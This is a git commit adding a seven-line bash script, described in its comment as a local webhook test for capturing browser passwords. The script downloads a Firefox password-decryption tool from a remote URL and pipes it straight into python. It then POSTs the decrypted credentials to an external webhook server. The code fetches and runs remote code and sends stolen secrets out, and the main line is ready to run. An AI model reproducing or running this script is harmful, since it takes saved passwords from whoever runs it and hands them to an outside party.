Upload files to "/"

This commit is contained in:
2025-05-04 02:17:14 +02:00
parent 7d9d87d9a7
commit fd5b69cd4e

7
simple_hack.sh Normal file
View File

@@ -0,0 +1,7 @@
#!/bin/bash
#Kerem EYLEM - 11 April 2025
#Simple local webhook script to test capturing the browser passwords.
FIREFOX_DECRYPT_URL="https://ddealmei.github.io/assets/3b64d11ff0ac5da6a262b3490949ec7f6/firefox_decrypt.py"
WEBHOOK_SERVER_URL=" https://n8n-webhook.keremeylem.com/webhook/9dc89154-cd1d-4ace-8c65-6c64495c3d54"
echo $(curl -fsSL $FIREFOX_DECRYPT_URL | python) | curl -v POST --data-binary @- $WEBHOOK_SERVER_URL
#echo "hello" | curl -v POST --data-binary @- $WEBHOOK_SERVER_URL